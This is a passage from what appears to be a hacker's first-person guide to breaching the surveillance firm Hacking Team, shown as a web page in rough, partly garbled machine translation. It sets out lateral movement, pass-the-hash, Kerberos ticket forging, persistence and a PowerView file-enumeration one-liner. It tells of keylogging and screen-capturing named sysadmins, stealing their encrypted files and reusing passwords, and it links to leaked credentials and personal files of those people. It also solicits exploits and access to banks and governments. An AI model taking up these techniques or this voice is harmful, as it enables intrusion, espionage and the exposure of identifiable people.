  577. [1] https://technet.microsoft.com/en-us/sysinternals/psexec.aspx
  578. [2] https://sourceforge.net/projects/winexe/
  579. [3] https://www.rapid7.com/db/modules/exploit/windows/smb/psexec_psh
  580. [4] http://www.powershellempire.com/?page_id=523
  581. [5] http://blog.cobaltstrike.com/2014/04/30/lateral-movement-with-high-latency-cc/
  582. [6] https://github.com/byt3bl33d3r/pth-toolkit
  583. [7] https://github.com/CoreSecurity/impacket/blob/master/examples/wmiexec.py
  584. [8] https://www.trustedsec.com/june-2015/no_psexec_needed/
  585. [9] http://www.powershellempire.com/?page_id=124
  586. [10] http://www.maquinasvirtuales.eu/ejecucion-remota-con-powershell/
  587. [11] https://adsecurity.org/?p=2277
  588. [12] https://www.secureworks.com/blog/where-you-at-indicators-of-lateral-movement-using-at-exe-on-windows-7-systems
  589. [13] https://github.com/PowerShellEmpire/Empire/blob/master/lib/modules/lateral_movement/new_gpo_immediate_task.py
  590. Movement "in situ"
  591. 1) Impersonalizando Tokens
  592. Once you have administrative access to a computer, you can use the
  593. tokens of other users to access resources in the domain. Two
  594. tools to do this are incognito [1] and commands token :: * of
  595. mimikatz [2].
  596. 2) MS14-068
  597. You can take advantage of a validation failure kerberos to generate a
  598. ticket domain administrator [3] [4] [5].
  599. 3) Pass the Hash
  600. If you have your hash but the user has not logged on you can use
  601. sekurlsa :: pth [2] for a ticket user.
  602. 4) Injection Process
  603. Any RAT can be injected to another process, for example the command
  604. pupy migrate in meterpreter and [6] or psinject [7] in powershell empire.
  605. You can inject the process with the token you want.
  606. 5) runes
  607. This is sometimes very useful because it does not require privileges
  608. administrator. The command is part of windows, but if you have no interface
  609. Graphics can use powershell [8].
  610. [1] https://www.indetectables.net/viewtopic.php?p=211165
  611. [2] https://adsecurity.org/?page_id=1821
  612. [3] https://github.com/bidord/pykek
  613. [4] https://adsecurity.org/?p=676
  614. [5] http://www.hackplayers.com/2014/12/CVE-2014-6324-como-validarse-con-cualquier-usuario-como-admin.html
  615. [6] https://github.com/n1nj4sec/pupy
  616. [7] http://www.powershellempire.com/?page_id=273
  617. [8] https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Invoke-Runas.ps1
  618. ---- [13.2 - Persistence] ----------------------------------------- ------------
  619. Having gained access, you want to keep. Indeed, the persistence
  620. It's just a challenge for motherfuckers like they want Hacking Team
  621. hack activists or other individuals. Companies to hack, it goes
  622. persistence because companies never sleep. I always use "persistence"
  623. Duqu style 2 run in RAM on a pair of servers with high
  624. uptime percentages. In the unlikely event that all restarted at a time,
  625. I have a ticket passwords and gold [1] to access booking. You can read
  626. more information on persistence mechanisms for windows here
  627. [2. 3. 4]. But to hack into companies, you do not need and increases the risk of
  628. detection.
  629. [1] http://blog.cobaltstrike.com/2014/05/14/meterpreter-kiwi-extension-golden-ticket-howto/
  630. [2] http://www.harmj0y.net/blog/empire/nothing-lasts-forever-persistence-with-empire/
  631. [3] http://www.hexacorn.com/blog/category/autostart-persistence/
  632. [4] https://blog.netspi.com/tag/persistence/
  633. ---- [13.3 - Internal Recognition] ---------------------------------------- ---
  634. The best tool for understanding today Windows is Powerview networks [1].
  635. Worth reading everything written by the author [2] above all [3], [4], [5] and
  636. [6]. Powershell itself is also very powerful [7]. As there are still many
  637. 2003 and 2000 servers without powershell, you must also learn the old
  638. school [8], with tools like netview.exe [9] or the command windows
  639. "Net view". Other techniques that I like are:
  640. 1) Download a list of file names
  641. With a domain administrator account, you can download all
  642. file names on the network with powerview:
  643. Invoke-ShareFinderThreaded -ExcludedShares IPC $, PRINT $, ADMIN $ |
  644. select-string '^ (. *) \ t' | % {$ _ Matches -recurse dir [0] .Groups [1]. |
  645. select fullname | files.txt -append out-file}
  646. Later, you can read at your own pace and choose which ones you want to download.
  647. 2) Read post
  648. As we have seen, you can be downloaded emails with powershell, and have
  649. lots of useful information.
  650. 3) Read sharepoint
  651. It is another place where many companies have important information. It can
  652. download with powershell [10].
  653. 4) Active Directory [11]
  654. It has lots of useful information about users and computers. Without being
  655. domain administrator, and you can find lots of information
  656. powerview and other tools [12]. After getting manager
  657. domain should export all the information of AD with csvde or other
  658. tool.
  659. 5) Spying on employees
  660. One of my favorite pastimes is hunting the sysadmins. spying
  661. Christan Pozzi (sysadmin Hacking Team) got the server accesso
  662. Nagios gave me accessibility to sviluppo rete (network development in
  663. RCS source code). With a simple combination of Get-Keystrokes and
  664. Get-TimedScreenshot of PowerSploit [13], Do-Exfiltration of Nishang [14], and
  665. GPO, you can spy on any employee or even the entire domain.
  666. [1] https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView
  667. [2] http://www.harmj0y.net/blog/tag/powerview/
  668. [3] http://www.harmj0y.net/blog/powershell/veil-powerview-a-usage-guide/
  669. [4] http://www.harmj0y.net/blog/redteaming/powerview-2-0/
  670. [5] http://www.harmj0y.net/blog/penetesting/i-hunt-sysadmins/
  671. [6] http://www.slideshare.net/harmj0y/i-have-the-powerview
  672. [7] https://adsecurity.org/?p=2535
  673. [8] https://www.youtube.com/watch?v=rpwrKhgMd7E
  674. [9] https://github.com/mubix/netview
  675. [10] https://blogs.msdn.microsoft.com/rcormier/2013/03/30/how-to-perform-bulk-downloads-of-files-in-sharepoint/
  676. [11] https://adsecurity.org/?page_id=41
  677. [12] http://www.darkoperator.com/?tag=Active+Directory
  678. [13] https://github.com/PowerShellMafia/PowerSploit
  679. [14] https://github.com/samratashok/nishang
  680. - [14 - Hunting Sysadmins] ------------------------------------------ ----------
  681. By reading the documentation of its infrastructure [1], I realized that even I
  682. lacked access to something important - "Rete Sviluppo" an isolated network
  683. keeps all the RCS source code. Sysadmins of a company always
  684. They have access to everything. I searched computers Mauro Romeo and Christian
  685. Pozzi to see how they handle the network sviluppo, and to see if there were other
  686. interesting systems should investigate. It was easy to access your
  687. computers since they were part of the Windows domain that had
  688. administrator. Mauro computer Romeo had no open port,
  689. so I opened the port of WMI [2] to execute meterpreter [3]. In addition to
  690. record catches with keys and Get-Keystrokes and Get-TimedScreenshot, used many
  691. modules / gather / metasploit, CredMan.ps1 [4], and searched files [5]. seeing
  692. that Pozzi had a Truecrypt volume, I waited until he had assembled to
  693. then copy the files. Many have laughed weak passwords
  694. Christian Pozzi (Christian Pozzi and generally provides enough material
  695. for comedy [6] [7] [8] [9]). I included them in filtration as an oversight and
  696. to laugh at him. The reality is that mimikatz and keyloggers see all
  697. same passwords.
  698. [1] http://hacking.technology/Hacked%20Team/FileServer/FileServer/Hackingteam/InfrastrutturaIT/
  699. [2] http://www.hammer-software.com/wmigphowto.shtml
  700. [3] https://www.trustedsec.com/june-2015/no_psexec_needed/
  701. [4] https://gallery.technet.microsoft.com/scriptcenter/PowerShell-Credentials-d44c3cde
  702. [5] http://pwnwiki.io/#!presence/windows/find_files.md
  703. [6] http://archive.is/TbaPy
  704. [7] http://hacking.technology/Hacked%20Team/c.pozzi/screenshots/
  705. [8] http://hacking.technology/Hacked%20Team/c.pozzi/Desktop/you.txt
  706. [9] http://hacking.technology/Hacked%20Team/c.pozzi/credentials/
  707. - [15 - The Bridge] ------------------------------------------ ------------------
  708. Within the volume encryption Christian Pozzi, there was a textfile with many
  709. passwords [1]. One was for a Nagios server Fully Automated,
  710. I had access to sviluppo network to monitor it. Had found
  711. the bridge. Only had the password for the Web interface, but there was a
  712. Public exploit [2] to execute code and get a shell (is an exploit
  713. unauthenticated, but it takes a user has logged in to the
  714. I used that password textfile).
  715. [1] http://hacking.technology/Hacked%20Team/c.pozzi/Truecrypt%20Volume/Login%20HT.txt
  716. [2] http://seclists.org/fulldisclosure/2014/Oct/78
  717. - [16 - Reusing and restoring passwords] ----------------------------
  718. Reading the post, he had seen Milan Daniele granting access to
  719. git repositories. And I had its windows password by mimikatz. The
  720. I tried with git server and it worked. I tried sudo and it worked. For him
  721. gitlab server and your twitter account, I used the "I forgot my
  722. Password "and my access to the mail server to restore
  723. password.
  724. - [17 - Conclusion] ------------------------------------------- ----------------
  725. It is done. So easy it is to tear down a company and stop their abuses
  726. human rights. That is the beauty and the asymmetry of hacking: with only a hundred
  727. hours of work, one person can undo years of work of a
  728. multimillion-dollar company. The hacking gives us the possibility of the dispossessed
  729. fight and win.
  730. Hacking guides often end with a warning: This information is
  731. only for educational purposes, I am an ethical hacker, not attacks on computers without
  732. permission, gobbledygook. I will say the same, but with a more rebellious concept
  733. hacking "ethical". Filter ethical hacking documents would expropriate money
  734. banks, and protect computers of ordinary people. However, the
  735. Most people who call themselves "ethical hackers" work only
  736. to protect those who pay their consulting fee, which often are the
  737. they most deserve to be hacked.
  738. Hacking Team is see themselves as part of a tradition of inspiring
  739. Italian [1] design. I see them Vincenzetti, your company, and their cronies
  740. police, police, and government, as part of a long tradition of
  741. Italian fascism. I want to dedicate this guide to the victims of the assault on the
  742. Armando Diaz school, and all those who have shed their blood on hands
  743. Italian fascists.
  744. [1] https://twitter.com/coracurrier/status/618104723263090688
  745. - [18 - Contact] ------------------------------------------- ------------------
  746. To send spearphishing attempts, death threats written in
  747. Italian [1] [2] and to give me 0days or access within banks,
  748. corporations, governments etc.
  749. [1] http://andres.delgado.ec/2016/01/15/el-miedo-de-vigilar-a-los-vigilantes/
  750. [2] https://twitter.com/CthulhuSec/status/619459002854977537
  751. porfa only encrypted mails:
  752. https://securityinabox.org/es/thunderbird_usarenigmail
  753. -----BEGIN PGP PUBLIC KEY BLOCK-----
  754. mQENBFVp37MBCACu0rMiDtOtn98NurHUPYyI3Fua+bmF2E7OUihTodv4F/N04KKx
  755. vDZlhKfgeLVSns5oSimBKhv4Z2bzvvc1w/00JH7UTLcZNbt9WGxtLEs+C+jF9j2g
  756. 27QIfOJGLFhzYm2GYWIiKr88y95YLJxvrMNmJEDwonTECY68RNaoohjy/TcdWA8x
  757. +fCM4OHxM4AwkqqbaAtqUwAJ3Wxr+Hr/3KV+UNV1lBPlGGVSnV+OA4m8XWaPE73h
  758. VYMVbIkJzOXK9enaXyiGKL8LdOHonz5LaGraRousmiu8JCc6HwLHWJLrkcTI9lP8
  759. Ms3gckaJ30JnPc/qGSaFqvl4pJbx/CK6CwqrABEBAAG0IEhhY2sgQmFjayEgPGhh
  760. Y2tiYWNrQHJpc2V1cC5uZXQ+iQE3BBMBCgAhBQJXAvPFAhsDBQsJCAcDBRUKCQgL
  761. BRYCAwEAAh4BAheAAAoJEDScPRHoqSXQoTwIAI8YFRdTptbyEl6Khk2h8+cr3tac
  762. QdqVNDdp6nbP2rVPW+o3DeTNg0R+87NAlGWPg17VWxsYoa4ZwKHdD/tTNPk0Sldf
  763. cQE+IBfSaO0084d6nvSYTpd6iWBvCgJ1iQQwCq0oTgROzDURvWZ6lwyTZ8XK1KF0
  764. JCloCSnbXB8cCemXnQLZwjGvBVgQyaF49rHYn9+edsudn341oPB+7LK7l8vj5Pys
  765. 4eauRd/XzYqxqNzlQ5ea6MZuZZL9PX8eN2obJzGaK4qvxQ31uDh/YiP3MeBzFJX8
  766. X2NYUOYWm3oxiGQohoAn//BVHtk2Xf7hxAY4bbDEQEoDLSPybZEXugzM6gC5AQ0E
  767. VWnfswEIANaqa8fFyiiXYWJVizUsVGbjTTO7WfuNflg4F/q/HQBYfl4ne3edL2Ai
  768. oHOGg0OMNuhNrs56eLRyB/6IjM3TCcfn074HL37eDT0Z9p+rbxPDPFOJAMFYyyjm
  769. n5a6HfmctRzjEXccKFaqlwalhnRP6MRFZGKU6+x1nXbiW8sqGEH0a/VdCR3/CY5F
  770. Pbvmhh894wOzivUlP86TwjWGxLu1kHFo7JDgp8YkRGsXv0mvFav70QXtHllxOAy9
  771. WlBP72gPyiWQ/fSUuoM+WDrMZZ9ETt0j3Uwx0Wo42ZoOXmbAd2jgJXSI9+9e4YUo
  772. jYYjoU4ZuX77iM3+VWW1J1xJujOXJ/sAEQEAAYkBHwQYAQIACQUCVWnfswIbDAAK
  773. CRA0nD0R6Kkl0ArYB/47LnABkz/t6M1PwOFvDN3e2JNgS1QV2YpBdog1hQj6RiEA
  774. OoeQKXTEYaymUwYXadSj7oCFRSyhYRvSMb4GZBa1bo8RxrrTVa0vZk8uA0DB1ZZR
  775. LWvSR7nwcUkZglZCq3Jpmsy1VLjCrMC4hXnFeGi9AX1fh28RYHudh8pecnGKh+Gi
  776. JKp0XtOqGF5NH/Zdgz6t+Z8U++vuwWQaubMJTRdMTGhaRv+jIzKOiO9YtPNamHRq
  777. Mf2vA3oqf22vgWQbK1MOK/4Tp6MGg/VR2SaKAsqyAZC7l5TeoSPN5HdEgA7u5GpB
  778. D0lLGUSkx24yD1sIAGEZ4B57VZNBS0az8HoQeF0k
  779. =E5+y
  780. -----END PGP PUBLIC KEY BLOCK-----
  781. If not you, who? If not now, when?
  782. _ _ _ ____ _ _
  783. | | | | __ _ ___| | __ | __ ) __ _ ___| | _| |
  784. | |_| |/ _` |/ __| |/ / | _ \ / _` |/ __| |/ / |
  785. | _ | (_| | (__| < | |_) | (_| | (__| <|_|
  786. |_| |_|\__,_|\___|_|\_\ |____/ \__,_|\___|_|\_(_)
  787. </code> </pre>
  788. </p>
  789. </div>
  790. </div>
  791. <hr>
  792. <footer>
  793. <p>CC BY-NC</p>
  794. </footer>
  795. </div> <!-- /container -->
  796. <!-- Le javascript
  797. ================================================== -->
  798. <!-- Placed at the end of the document so the pages load faster -->
  799. <script src="js/jquery.js"></script>
  800. <script src="js/bootstrap-386.js"></script>
  801. <script src="js/bootstrap-transition.js"></script>
  802. <script src="js/bootstrap-alert.js"></script>
  803. <script src="js/bootstrap-modal.js"></script>
  804. <script src="js/bootstrap-dropdown.js"></script>
  805. <script src="js/bootstrap-scrollspy.js"></script>
  806. <script src="js/bootstrap-tab.js"></script>
  807. <script src="js/bootstrap-tooltip.js"></script>
  808. <script src="js/bootstrap-popover.js"></script>
  809. <script src="js/bootstrap-button.js"></script>
  810. <script src="js/bootstrap-collapse.js"></script>
  811. <script src="js/bootstrap-carousel.js"></script>
  812. <script src="js/bootstrap-typeahead.js"></script>
  813. <script src="js/bootstrap-affix.js"></script>
  814. <script>
  815. _386 = { onePass: true, speedFactor: 0.825 };
  816. </script>
  817. </body>
  818. </html>